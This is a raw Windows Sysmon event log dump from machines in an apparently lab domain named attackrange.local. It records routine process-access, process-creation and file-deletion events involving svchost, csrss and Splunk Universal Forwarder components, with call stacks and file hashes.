09:24:29.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056888Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056887Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056886Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056885Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.780{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8DCD-6151-B800-00000000FD01}5476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056884Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.780{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8DCD-6151-B800-00000000FD01}5476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056883Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.781{5EBD8912-8DCD-6151-B800-00000000FD01}5476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056882Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.702{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB0AF98BA3C1C0AF7EB835D3516695D2,SHA256=29500A2B1C9AE36D80027F0CCE10B760B290D35836BFD1ABB218AEE4633BF4E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981451Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.363{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=553DC226AD103646E2565A9B7BD9C312,SHA256=C1125F34E4E012FB6D69EE62ACCF48C9429FE5CA7CCCF09F041A1927BDA73E8E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981450Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.238{69CF5F33-8DCD-6151-207A-00000000FD01}38521716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981449Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8DCD-6151-207A-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981448Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981447Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981446Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981445Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981444Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981443Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981442Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981441Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981440Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981439Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8DCD-6151-207A-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981438Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.020{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8DCD-6151-207A-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981437Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:29.005{69CF5F33-8DCD-6151-207A-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056881Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.093{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39B1569E4DC2E17A0E3A54166805CBD1,SHA256=0E26A73F19515D109F78272290ADCF4EE0A96994EA85132A06C4E8966E90A3F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056880Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.093{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C763F445E9757CD73C4218C48DFF787E,SHA256=6E6C288A4D98EF2C442C056CAB9628CC3B92F50D736824FF954ACFE23516E847,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056901Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:30.968{5EBD8912-8DCE-6151-B900-00000000FD01}56562192C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056900Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:30.780{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8DCE-6151-B900-00000000FD01}5656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056899Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:30.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056898Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:30.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056897Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 